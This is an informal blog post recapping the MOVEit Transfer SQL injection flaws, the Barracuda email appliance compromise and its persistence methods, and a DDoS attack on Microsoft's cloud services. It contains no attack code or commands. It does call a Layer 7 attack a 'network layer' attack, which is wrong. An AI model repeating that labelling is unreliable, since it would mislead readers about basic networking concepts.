“If you think you know-it-all about cybersecurity, this discipline was probably ill-explained to you.”
Stephane Nappo
In my old blog, I used to take some time and write about the latest breaches, exploits, and vulnerabilities that have been seen out in the wild. It wasn’t because I wanted to be another voice out in the world talking about all the security issues being found. It was more so that I could stay up to date and be educated on the latest happenings in the cyber security world (do we still call it cyber security?). I’ve spent a lot of time on Ai lately but I want to get back to what I know best and that is security. So here are some of the latest going on in security today:
MOVEit
Progress Software’s MOVEit Transfer application has been found to have multiple security vulnerabilities. Personally, I have never heard of this application but a lot of government and Fortune 500 companies use it to transfer files securely internally and externally. Unfortunately, in May it was found to have a SQL injection flaw that when abused can allow an attacker to upload files, download files, and take control of the affected system. The vulnerabilities disclosed in June were a Zeroday as no mitigation existed to stop the issue. Compounding the issue (CVE-2023-34362), two more vulnerabilities were discovered that could allow an attacker to steal data from the affected system. HorizonAi provided a simple POC here if you want to play around with it. It’s a great POC as it’s fully commented in Python on how the attack works. What makes this attack particularly bad is its widespread use and that data gained from the attack is considered sensitive being a “secure” file transfer application. It’s a bad look for Progress Software since the product is marketed as “Secure File Transfer and Automation Software for the Enterprise”. With 3 SQL injection vulnerabilities found it makes me wonder if any pen testing was done on their own software. The SQL injection vulnerabilities aren’t overly difficult to execute and more of them continue to be found. Already, local governments in the united states are warning of data breaches from this attack. I wish all the best to the security team over there and I hope it doesn’t get worse.
Barracuda Email Security Appliance
This gem of a CVE I have personal experience with. While I have not used Barracuda Email Security Appliances (ESG), the parent company I worked for did. Last fall the company I worked for started seeing an absolute deluge of email traffic from Barracuda ESG appliances. It amounted to us as a DDOS attack against our website on top of a large increase in phishing to our employees. We thought the root cause was a bounce or reflection of our Sendgrid marketing emails back to us and that the phishing increase was a separate issue. In the end, we blocked that traffic with the help of our bot mitigation company and went on with our lives. It turns out that the traffic we were seeing was compromised ESG appliances. Now, I am not going to do a major write-up of how this attack worked as Manidant already has a phenomenal write-up here. What made this attack particularly bad was something we deal with a lot in information security: persistence.
Once the attacker saw that Barracuda was trying to solve the flaw they kicked into overdrive. Their first attempt at persistence was setting up cron jobs that enabled a reverse shell and ran hourly. Later attempts modified the Perl update script built into the appliance to execute code. Finally, to top it all off they deployed a kernel rootkit that would be run at boot time. The persistence is so bad, both Barracuda and Mandiant recommend that customers replace their entire hardware (oof)! The attacker is most likely from China as Mandiant discovered that during exfiltration the attacker was mainly looking for specific emails from East Asian academics and government officials. It’s not every day that a system is so seriously infected that the entire system needs to be replaced. I wish the security team over at Barracuda all the best.
Microsoft Office DDos Outage
While DDosing a site isn’t hacking or a vulnerability it is annoying. What makes this attack interesting is that it happened to such a large company and more specifically a product that has defenses in place to mitigate such an attack. This report hit late last night and can be read here. Basically, a group from Sudan (not verified) launched a Layer 7 (network layer) DDos attack against Microsoft’s cloud services. Microsoft didn’t provide much data on how much traffic hit them but they did say it involved different methods of overloading their cloud resources. They did say however that the attack used, “rented cloud resources, botnets, proxies, and VPNs” to attack them. So, whoever this attacker is they are coordinated in some way to deploy so many resources to hit a complex target like Azure. Microsoft was obviously able to mitigate the attack and make some changes to its firewalls in case of future attacks. I do hope Microsoft releases more information in the future. It was probably a rough day for the network engineers and security engineers over at Microsoft. I hope they get some rest!
Conclusion
There have been multiple vulnerabilities and disclosures this month but I wanted to just focus on the big ones. I’ll continue writing these once or twice a month depending on the security landscape and my time. I know in previous posts I went more in-depth on how some of these attacks worked. In future posts I will dive deeper, I just need to get used to writing again. Until next time and stay safe out there!